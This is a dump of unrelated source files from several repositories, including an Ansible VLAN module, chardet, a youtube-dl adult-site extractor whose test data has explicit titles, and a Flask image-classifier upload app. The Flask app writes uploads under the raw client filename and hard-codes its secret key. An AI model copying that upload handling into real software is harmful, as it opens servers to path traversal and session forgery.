u'\u015f' # 0xBA -> LATIN SMALL LETTER S WITH CEDILLA
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u013d' # 0xBC -> LATIN CAPITAL LETTER L WITH CARON
u'\u02dd' # 0xBD -> DOUBLE ACUTE ACCENT
u'\u013e' # 0xBE -> LATIN SMALL LETTER L WITH CARON
u'\u017c' # 0xBF -> LATIN SMALL LETTER Z WITH DOT ABOVE
u'\u0154' # 0xC0 -> LATIN CAPITAL LETTER R WITH ACUTE
u'\xc1' # 0xC1 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xc2' # 0xC2 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\u0102' # 0xC3 -> LATIN CAPITAL LETTER A WITH BREVE
u'\xc4' # 0xC4 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\u0139' # 0xC5 -> LATIN CAPITAL LETTER L WITH ACUTE
u'\u0106' # 0xC6 -> LATIN CAPITAL LETTER C WITH ACUTE
u'\xc7' # 0xC7 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\u010c' # 0xC8 -> LATIN CAPITAL LETTER C WITH CARON
u'\xc9' # 0xC9 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\u0118' # 0xCA -> LATIN CAPITAL LETTER E WITH OGONEK
u'\xcb' # 0xCB -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\u011a' # 0xCC -> LATIN CAPITAL LETTER E WITH CARON
u'\xcd' # 0xCD -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xCE -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\u010e' # 0xCF -> LATIN CAPITAL LETTER D WITH CARON
u'\u0110' # 0xD0 -> LATIN CAPITAL LETTER D WITH STROKE
u'\u0143' # 0xD1 -> LATIN CAPITAL LETTER N WITH ACUTE
u'\u0147' # 0xD2 -> LATIN CAPITAL LETTER N WITH CARON
u'\xd3' # 0xD3 -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xD4 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\u0150' # 0xD5 -> LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
u'\xd6' # 0xD6 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xd7' # 0xD7 -> MULTIPLICATION SIGN
u'\u0158' # 0xD8 -> LATIN CAPITAL LETTER R WITH CARON
u'\u016e' # 0xD9 -> LATIN CAPITAL LETTER U WITH RING ABOVE
u'\xda' # 0xDA -> LATIN CAPITAL LETTER U WITH ACUTE
u'\u0170' # 0xDB -> LATIN CAPITAL LETTER U WITH DOUBLE ACUTE
u'\xdc' # 0xDC -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xdd' # 0xDD -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\u0162' # 0xDE -> LATIN CAPITAL LETTER T WITH CEDILLA
u'\xdf' # 0xDF -> LATIN SMALL LETTER SHARP S
u'\u0155' # 0xE0 -> LATIN SMALL LETTER R WITH ACUTE
u'\xe1' # 0xE1 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe2' # 0xE2 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\u0103' # 0xE3 -> LATIN SMALL LETTER A WITH BREVE
u'\xe4' # 0xE4 -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u013a' # 0xE5 -> LATIN SMALL LETTER L WITH ACUTE
u'\u0107' # 0xE6 -> LATIN SMALL LETTER C WITH ACUTE
u'\xe7' # 0xE7 -> LATIN SMALL LETTER C WITH CEDILLA
u'\u010d' # 0xE8 -> LATIN SMALL LETTER C WITH CARON
u'\xe9' # 0xE9 -> LATIN SMALL LETTER E WITH ACUTE
u'\u0119' # 0xEA -> LATIN SMALL LETTER E WITH OGONEK
u'\xeb' # 0xEB -> LATIN SMALL LETTER E WITH DIAERESIS
u'\u011b' # 0xEC -> LATIN SMALL LETTER E WITH CARON
u'\xed' # 0xED -> LATIN SMALL LETTER I WITH ACUTE
u'\xee' # 0xEE -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\u010f' # 0xEF -> LATIN SMALL LETTER D WITH CARON
u'\u0111' # 0xF0 -> LATIN SMALL LETTER D WITH STROKE
u'\u0144' # 0xF1 -> LATIN SMALL LETTER N WITH ACUTE
u'\u0148' # 0xF2 -> LATIN SMALL LETTER N WITH CARON
u'\xf3' # 0xF3 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf4' # 0xF4 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\u0151' # 0xF5 -> LATIN SMALL LETTER O WITH DOUBLE ACUTE
u'\xf6' # 0xF6 -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0xF7 -> DIVISION SIGN
u'\u0159' # 0xF8 -> LATIN SMALL LETTER R WITH CARON
u'\u016f' # 0xF9 -> LATIN SMALL LETTER U WITH RING ABOVE
u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\u0171' # 0xFB -> LATIN SMALL LETTER U WITH DOUBLE ACUTE
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xfd' # 0xFD -> LATIN SMALL LETTER Y WITH ACUTE
u'\u0163' # 0xFE -> LATIN SMALL LETTER T WITH CEDILLA
u'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
emoronayuso/beeton
|
refs/heads/master
|
asterisk-bee/asteriskbee/api_colas_llamadas/views.py
|
6027
|
# Create your views here.
|
toshywoshy/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/dimensiondata/dimensiondata_vlan.py
|
21
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Dimension Data
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# - Adam Friedman <tintoy@tintoy.io>
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'
}
DOCUMENTATION = '''
---
module: dimensiondata_vlan
short_description: Manage a VLAN in a Cloud Control network domain.
extends_documentation_fragment:
- dimensiondata
- dimensiondata_wait
description:
- Manage VLANs in Cloud Control network domains.
version_added: "2.5"
author: 'Adam Friedman (@tintoy)'
options:
name:
description:
- The name of the target VLAN.
- Required if C(state) is C(present).
description:
description:
- A description of the VLAN.
network_domain:
description:
- The Id or name of the target network domain.
required: true
private_ipv4_base_address:
description:
- The base address for the VLAN's IPv4 network (e.g. 192.168.1.0).
private_ipv4_prefix_size:
description:
- The size of the IPv4 address space, e.g 24.
- Required, if C(private_ipv4_base_address) is specified.
state:
description:
- The desired state for the target VLAN.
- C(readonly) ensures that the state is only ever read, not modified (the module will fail if the resource does not exist).
choices: [present, absent, readonly]
default: present
allow_expand:
description:
- Permit expansion of the target VLAN's network if the module parameters specify a larger network than the VLAN currently possesses.
- If C(False), the module will fail under these conditions.
- This is intended to prevent accidental expansion of a VLAN's network (since this operation is not reversible).
type: bool
default: 'no'
'''
EXAMPLES = '''
# Add or update VLAN
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan1
description: A test VLAN
private_ipv4_base_address: 192.168.23.0
private_ipv4_prefix_size: 24
state: present
wait: yes
# Read / get VLAN details
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan1
state: readonly
wait: yes
# Delete a VLAN
- dimensiondata_vlan:
region: na
location: NA5
network_domain: test_network
name: my_vlan_1
state: absent
wait: yes
'''
RETURN = '''
vlan:
description: Dictionary describing the VLAN.
returned: On success when I(state) is 'present'
type: complex
contains:
id:
description: VLAN ID.
type: str
sample: "aaaaa000-a000-4050-a215-2808934ccccc"
name:
description: VLAN name.
type: str
sample: "My VLAN"
description:
description: VLAN description.
type: str
sample: "My VLAN description"
location:
description: Datacenter location.
type: str
sample: NA3
private_ipv4_base_address:
description: The base address for the VLAN's private IPV4 network.
type: str
sample: 192.168.23.0
private_ipv4_prefix_size:
description: The prefix size for the VLAN's private IPV4 network.
type: int
sample: 24
private_ipv4_gateway_address:
description: The gateway address for the VLAN's private IPV4 network.
type: str
sample: 192.168.23.1
private_ipv6_base_address:
description: The base address for the VLAN's IPV6 network.
type: str
sample: 2402:9900:111:1195:0:0:0:0
private_ipv6_prefix_size:
description: The prefix size for the VLAN's IPV6 network.
type: int
sample: 64
private_ipv6_gateway_address:
description: The gateway address for the VLAN's IPV6 network.
type: str
sample: 2402:9900:111:1195:0:0:0:1
status:
description: VLAN status.
type: str
sample: NORMAL
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.dimensiondata import DimensionDataModule, UnknownNetworkError
try:
from libcloud.common.dimensiondata import DimensionDataVlan, DimensionDataAPIException
HAS_LIBCLOUD = True
except ImportError:
DimensionDataVlan = None
HAS_LIBCLOUD = False
class DimensionDataVlanModule(DimensionDataModule):
"""
The dimensiondata_vlan module for Ansible.
"""
def __init__(self):
"""
Create a new Dimension Data VLAN module.
"""
super(DimensionDataVlanModule, self).__init__(
module=AnsibleModule(
argument_spec=DimensionDataModule.argument_spec_with_wait(
name=dict(required=True, type='str'),
description=dict(default='', type='str'),
network_domain=dict(required=True, type='str'),
private_ipv4_base_address=dict(default='', type='str'),
private_ipv4_prefix_size=dict(default=0, type='int'),
allow_expand=dict(required=False, default=False, type='bool'),
state=dict(default='present', choices=['present', 'absent', 'readonly'])
),
required_together=DimensionDataModule.required_together()
)
)
self.name = self.module.params['name']
self.description = self.module.params['description']
self.network_domain_selector = self.module.params['network_domain']
self.private_ipv4_base_address = self.module.params['private_ipv4_base_address']
self.private_ipv4_prefix_size = self.module.params['private_ipv4_prefix_size']
self.state = self.module.params['state']
self.allow_expand = self.module.params['allow_expand']
if self.wait and self.state != 'present':
self.module.fail_json(
msg='The wait parameter is only supported when state is "present".'
)
def state_present(self):
"""
Ensure that the target VLAN is present.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if not vlan:
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is absent from network domain "{1}" (should be present).'.format(
self.name, self.network_domain_selector
),
changed=True
)
vlan = self._create_vlan(network_domain)
self.module.exit_json(
msg='Created VLAN "{0}" in network domain "{1}".'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
else:
diff = VlanDiff(vlan, self.module.params)
if not diff.has_changes():
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (no changes detected).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=False
)
return
try:
diff.ensure_legal_change()
except InvalidVlanChangeError as invalid_vlan_change:
self.module.fail_json(
msg='Unable to update VLAN "{0}" in network domain "{1}": {2}'.format(
self.name, self.network_domain_selector, invalid_vlan_change
)
)
if diff.needs_expand() and not self.allow_expand:
self.module.fail_json(
msg='The configured private IPv4 network size ({0}-bit prefix) for '.format(
self.private_ipv4_prefix_size
) + 'the VLAN differs from its current network size ({0}-bit prefix) '.format(
vlan.private_ipv4_range_size
) + 'and needs to be expanded. Use allow_expand=true if this is what you want.'
)
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (changes detected).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
if diff.needs_edit():
vlan.name = self.name
vlan.description = self.description
self.driver.ex_update_vlan(vlan)
if diff.needs_expand():
vlan.private_ipv4_range_size = self.private_ipv4_prefix_size
self.driver.ex_expand_vlan(vlan)
self.module.exit_json(
msg='Updated VLAN "{0}" in network domain "{1}".'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
def state_readonly(self):
"""
Read the target VLAN's state.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if vlan:
self.module.exit_json(
vlan=vlan_to_dict(vlan),
changed=False
)
else:
self.module.fail_json(
msg='VLAN "{0}" does not exist in network domain "{1}".'.format(
self.name, self.network_domain_selector
)
)
def state_absent(self):
"""
Ensure that the target VLAN is not present.
"""
network_domain = self._get_network_domain()
vlan = self._get_vlan(network_domain)
if not vlan:
self.module.exit_json(
msg='VLAN "{0}" is absent from network domain "{1}".'.format(
self.name, self.network_domain_selector
),
changed=False
)
return
if self.module.check_mode:
self.module.exit_json(
msg='VLAN "{0}" is present in network domain "{1}" (should be absent).'.format(
self.name, self.network_domain_selector
),
vlan=vlan_to_dict(vlan),
changed=True
)
self._delete_vlan(vlan)
self.module.exit_json(
msg='Deleted VLAN "{0}" from network domain "{1}".'.format(
self.name, self.network_domain_selector
),
changed=True
)
def _get_vlan(self, network_domain):
"""
Retrieve the target VLAN details from CloudControl.
:param network_domain: The target network domain.
:return: The VLAN, or None if the target VLAN was not found.
:rtype: DimensionDataVlan
"""
vlans = self.driver.ex_list_vlans(
location=self.location,
network_domain=network_domain
)
matching_vlans = [vlan for vlan in vlans if vlan.name == self.name]
if matching_vlans:
return matching_vlans[0]
return None
def _create_vlan(self, network_domain):
vlan = self.driver.ex_create_vlan(
network_domain,
self.name,
self.private_ipv4_base_address,
self.description,
self.private_ipv4_prefix_size
)
if self.wait:
vlan = self._wait_for_vlan_state(vlan.id, 'NORMAL')
return vlan
def _delete_vlan(self, vlan):
try:
self.driver.ex_delete_vlan(vlan)
# Not currently supported for deletes due to a bug in libcloud (module will error out if "wait" is specified when "state" is not "present").
if self.wait:
self._wait_for_vlan_state(vlan, 'NOT_FOUND')
except DimensionDataAPIException as api_exception:
self.module.fail_json(
msg='Failed to delete VLAN "{0}" due to unexpected error from the CloudControl API: {1}'.format(
vlan.id, api_exception.msg
)
)
def _wait_for_vlan_state(self, vlan, state_to_wait_for):
network_domain = self._get_network_domain()
wait_poll_interval = self.module.params['wait_poll_interval']
wait_time = self.module.params['wait_time']
# Bizarre bug in libcloud when checking status after delete; socket.error is too generic to catch in this context so for now we don't even try.
try:
return self.driver.connection.wait_for_state(
state_to_wait_for,
self.driver.ex_get_vlan,
wait_poll_interval,
wait_time,
vlan
)
except DimensionDataAPIException as api_exception:
if api_exception.code != 'RESOURCE_NOT_FOUND':
raise
return DimensionDataVlan(
id=vlan.id,
status='NOT_FOUND',
name='',
description='',
private_ipv4_range_address='',
private_ipv4_range_size=0,
ipv4_gateway='',
ipv6_range_address='',
ipv6_range_size=0,
ipv6_gateway='',
location=self.location,
network_domain=network_domain
)
def _get_network_domain(self):
"""
Retrieve the target network domain from the Cloud Control API.
:return: The network domain.
"""
try:
return self.get_network_domain(
self.network_domain_selector, self.location
)
except UnknownNetworkError:
self.module.fail_json(
msg='Cannot find network domain "{0}" in datacenter "{1}".'.format(
self.network_domain_selector, self.location
)
)
return None
class InvalidVlanChangeError(Exception):
"""
Error raised when an illegal change to VLAN state is attempted.
"""
pass
class VlanDiff(object):
"""
Represents differences between VLAN information (from CloudControl) and module parameters.
"""
def __init__(self, vlan, module_params):
"""
:param vlan: The VLAN information from CloudControl.
:type vlan: DimensionDataVlan
:param module_params: The module parameters.
:type module_params: dict
"""
self.vlan = vlan
self.module_params = module_params
self.name_changed = module_params['name'] != vlan.name
self.description_changed = module_params['description'] != vlan.description
self.private_ipv4_base_address_changed = module_params['private_ipv4_base_address'] != vlan.private_ipv4_range_address
self.private_ipv4_prefix_size_changed = module_params['private_ipv4_prefix_size'] != vlan.private_ipv4_range_size
# Is configured prefix size greater than or less than the actual prefix size?
private_ipv4_prefix_size_difference = module_params['private_ipv4_prefix_size'] - vlan.private_ipv4_range_size
self.private_ipv4_prefix_size_increased = private_ipv4_prefix_size_difference > 0
self.private_ipv4_prefix_size_decreased = private_ipv4_prefix_size_difference < 0
def has_changes(self):
"""
Does the VlanDiff represent any changes between the VLAN and module configuration?
:return: True, if there are change changes; otherwise, False.
"""
return self.needs_edit() or self.needs_expand()
def ensure_legal_change(self):
"""
Ensure the change (if any) represented by the VlanDiff represents a legal change to VLAN state.
- private_ipv4_base_address cannot be changed
- private_ipv4_prefix_size must be greater than or equal to the VLAN's existing private_ipv4_range_size
:raise InvalidVlanChangeError: The VlanDiff does not represent a legal change to VLAN state.
"""
# Cannot change base address for private IPv4 network.
if self.private_ipv4_base_address_changed:
raise InvalidVlanChangeError('Cannot change the private IPV4 base address for an existing VLAN.')
# Cannot shrink private IPv4 network (by increasing prefix size).
if self.private_ipv4_prefix_size_increased:
raise InvalidVlanChangeError('Cannot shrink the private IPV4 network for an existing VLAN (only expand is supported).')
def needs_edit(self):
"""
Is an Edit operation required to resolve the differences between the VLAN information and the module parameters?
:return: True, if an Edit operation is required; otherwise, False.
"""
return self.name_changed or self.description_changed
def needs_expand(self):
"""
Is an Expand operation required to resolve the differences between the VLAN information and the module parameters?
The VLAN's network is expanded by reducing the size of its network prefix.
:return: True, if an Expand operation is required; otherwise, False.
"""
return self.private_ipv4_prefix_size_decreased
def vlan_to_dict(vlan):
return {
'id': vlan.id,
'name': vlan.name,
'description': vlan.description,
'location': vlan.location.id,
'private_ipv4_base_address': vlan.private_ipv4_range_address,
'private_ipv4_prefix_size': vlan.private_ipv4_range_size,
'private_ipv4_gateway_address': vlan.ipv4_gateway,
'ipv6_base_address': vlan.ipv6_range_address,
'ipv6_prefix_size': vlan.ipv6_range_size,
'ipv6_gateway_address': vlan.ipv6_gateway,
'status': vlan.status
}
def main():
module = DimensionDataVlanModule()
if module.state == 'present':
module.state_present()
elif module.state == 'readonly':
module.state_readonly()
elif module.state == 'absent':
module.state_absent()
if __name__ == '__main__':
main()
|
twlizer/plugin.video.Pseudonymous
|
refs/heads/master
|
chardet/codingstatemachine.py
|
206
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart
from .compat import wrap_ord
class CodingStateMachine:
def __init__(self, sm):
self._mModel = sm
self._mCurrentBytePos = 0
self._mCurrentCharLen = 0
self.reset()
def reset(self):
self._mCurrentState = eStart
def next_state(self, c):
# for each byte we get its class
# if it is first byte, we also get byte length
# PY3K: aBuf is a byte stream, so c is an int, not a byte
byteCls = self._mModel['classTable'][wrap_ord(c)]
if self._mCurrentState == eStart:
self._mCurrentBytePos = 0
self._mCurrentCharLen = self._mModel['charLenTable'][byteCls]
# from byte's class and stateTable, we get its next state
curr_state = (self._mCurrentState * self._mModel['classFactor']
+ byteCls)
self._mCurrentState = self._mModel['stateTable'][curr_state]
self._mCurrentBytePos += 1
return self._mCurrentState
def get_current_charlen(self):
return self._mCurrentCharLen
def get_coding_state_machine(self):
return self._mModel['name']
|
luoxufeiyan/python
|
refs/heads/master
|
NKUCodingCat/0007/0007.py
|
40
|
#coding=utf-8
import os,sys,re
def each(path):
All = []
for root, dirs, files in os.walk(path):
for name in files:
All.append(root+"/"+name)
return All
def deal(input):
if os.path.splitext(input)[1] in [".py",".pyw"]:
total,comment,empty = 0,0,0
f = open(input,"r")
in_comment = False
for line in f:
total+=1
if re.findall("\"\"\"$",line):
if in_comment:
in_comment = False
else:
in_comment = True
if not re.findall("\S",line):
empty+=1
if line[0] == "#" or in_comment:
comment += 1
return total,comment,empty
else:
return 0,0,0
if len(sys.argv)<=1:
print "The Script will calculate the LOC of the file in "+os.path.split(os.path.realpath(__file__))[0]+"/"
path = os.path.split(os.path.realpath(__file__))[0]+"/"
else:
print "calculating the file in "+sys.argv[1]
if os.path.isdir(sys.argv[1]):
path = sys.argv[1]
else:
print "Path Error! use this script as "+os.path.split(os.path.realpath(__file__))[1]+" [path]"
t,c,e = 0,0,0
for i in each(path):
t_a,c_a,e_a = deal(i)
t+=t_a
c+=c_a
e+=e_a
print("Total lines: %s. Empty lines: %s. Comment Lines: %s." % (t, e, c))
|
ClearCorp-dev/odoo
|
refs/heads/8.0
|
addons/event/report/__init__.py
|
435
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import report_event_registration
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
misterhat/youtube-dl
|
refs/heads/master
|
youtube_dl/extractor/pornhd.py
|
19
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
int_or_none,
js_to_json,
)
class PornHdIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?pornhd\.com/(?:[a-z]{2,4}/)?videos/(?P<id>\d+)(?:/(?P<display_id>.+))?'
_TESTS = [{
'url': 'http://www.pornhd.com/videos/9864/selfie-restroom-masturbation-fun-with-chubby-cutie-hd-porn-video',
'md5': 'c8b964b1f0a4b5f7f28ae3a5c9f86ad5',
'info_dict': {
'id': '9864',
'display_id': 'selfie-restroom-masturbation-fun-with-chubby-cutie-hd-porn-video',
'ext': 'mp4',
'title': 'Restroom selfie masturbation',
'description': 'md5:3748420395e03e31ac96857a8f125b2b',
'thumbnail': 're:^https?://.*\.jpg',
'view_count': int,
'age_limit': 18,
}
}, {
# removed video
'url': 'http://www.pornhd.com/videos/1962/sierra-day-gets-his-cum-all-over-herself-hd-porn-video',
'md5': '956b8ca569f7f4d8ec563e2c41598441',
'info_dict': {
'id': '1962',
'display_id': 'sierra-day-gets-his-cum-all-over-herself-hd-porn-video',
'ext': 'mp4',
'title': 'Sierra loves doing laundry',
'description': 'md5:8ff0523848ac2b8f9b065ba781ccf294',
'thumbnail': 're:^https?://.*\.jpg',
'view_count': int,
'age_limit': 18,
},
'skip': 'Not available anymore',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id')
webpage = self._download_webpage(url, display_id or video_id)
title = self._html_search_regex(
[r'<span[^>]+class=["\']video-name["\'][^>]*>([^<]+)',
r'<title>(.+?) - .*?[Pp]ornHD.*?</title>'], webpage, 'title')
sources = self._parse_json(js_to_json(self._search_regex(
r"(?s)'sources'\s*:\s*(\{.+?\})\s*\}[;,)]",
webpage, 'sources', default='{}')), video_id)
if not sources:
message = self._html_search_regex(
r'(?s)<(div|p)[^>]+class="no-video"[^>]*>(?P<value>.+?)</\1',
webpage, 'error message', group='value')
raise ExtractorError('%s said: %s' % (self.IE_NAME, message), expected=True)
formats = []
for format_id, video_url in sources.items():
if not video_url:
continue
height = int_or_none(self._search_regex(
r'^(\d+)[pP]', format_id, 'height', default=None))
formats.append({
'url': video_url,
'format_id': format_id,
'height': height,
})
self._sort_formats(formats)
description = self._html_search_regex(
r'<(div|p)[^>]+class="description"[^>]*>(?P<value>[^<]+)</\1',
webpage, 'description', fatal=False, group='value')
view_count = int_or_none(self._html_search_regex(
r'(\d+) views\s*<', webpage, 'view count', fatal=False))
thumbnail = self._search_regex(
r"'poster'\s*:\s*'([^']+)'", webpage, 'thumbnail', fatal=False)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'view_count': view_count,
'formats': formats,
'age_limit': 18,
}
|
robben1234/CNN-CIFAR10-Classifier
|
refs/heads/master
|
image-classifier.py
|
1
|
import os
from flask import Flask, flash, request, redirect, url_for, jsonify
from flask import render_template
from werkzeug.contrib.fixers import ProxyFix
from cnncifar10use import predict as nn_predict
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
CLASSES = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
UPLOAD_FOLDER = os.path.join(APP_ROOT, 'static/uploads')
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['APP_ROOT'] = APP_ROOT
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print("/upload post request")
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
print(file)
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)
file.save(path)
(pred_f),(pred) = nn_predict(path, app.config['APP_ROOT'])
result = CLASSES[pred]
print("%s"%result)
# os.remove(path)
for the_file in os.listdir(app.config['UPLOAD_FOLDER']):
fp = os.path.join(app.config['UPLOAD_FOLDER'], the_file)
try:
if os.path.isfile(fp):
os.unlink(fp)
except Exception as e:
print(e)
return jsonify(class_of_image=result)
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form action="" method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
@app.route('/')
def hello_world():
return render_template('home.html')
if __name__ == '__main__':
app.secret_key = 'super secret key'
app.config['SESSION_TYPE'] = 'filesystem'
app.run()
|
darko-bede/HardWay
|
refs/heads/master
|
ex32.py
|
1
|
the_count = [1, 2, 3, 4, 5]
fruits = ["apples", "oranges", "pears", "apricots"]
change = [1, "pennies", 2, "dimes", 3, "quarters"]
# This first kind of for loop goes through a list
for number in the_count:
print "This is count %d" % number
# same as above
for fruit in fruits:
print "A fruit of type: %s" % fruit
# also we can go through mixed lists too
# notice we hav to use %r since we don't know what's in it
for i in change:
print "I got %r" % i
# we can also build lists, first start with an empty one
elements = []
# then use the range function to do 0 to 5 counts
for i in range(0, 6):
print "Adding %d to the list." % i
# append is a function that list understand
elements.append(i)
# now we can print them out too
for i in elements:
print "Elements was: %d" % i
|
wrouesnel/ansible
|
refs/heads/devel
|
test/units/modules/network/f5/test_bigip_ucs.py
|
12
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import Mock
from ansible.compat.tests.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.bigip_ucs import Parameters
from library.bigip_ucs import ModuleManager
from library.bigip_ucs import ArgumentSpec
from library.bigip_ucs import V1Manager
from library.bigip_ucs import V2Manager
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_ucs import Parameters
from ansible.modules.network.f5.bigip_ucs import ModuleManager
from ansible.modules.network.f5.bigip_ucs import ArgumentSpec
from ansible.modules.network.f5.bigip_ucs import V1Manager
from ansible.modules.network.f5.bigip_ucs import V2Manager
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
ucs="/root/bigip.localhost.localdomain.ucs",
force=True,
include_chassis_level_config=True,
no_license=True,
no_platform_check=True,
passphrase="foobar",
reset_trust=True,
state='installed'
)
p = Parameters(params=args)
assert p.ucs == '/root/bigip.localhost.localdomain.ucs'
assert p.force is True
assert p.include_chassis_level_config is True
assert p.no_license is True
assert p.no_platform_check is True
assert p.passphrase == "foobar"
assert p.reset_trust is True
assert p.install_command == \
"tmsh load sys ucs /var/local/ucs/bigip.localhost.localdomain.ucs " \
"include-chassis-level-config no-license no-platform-check " \
"passphrase foobar reset-trust"
def test_module_parameters_false_ucs_booleans(self):
args = dict(
ucs="/root/bigip.localhost.localdomain.ucs",
include_chassis_level_config=False,
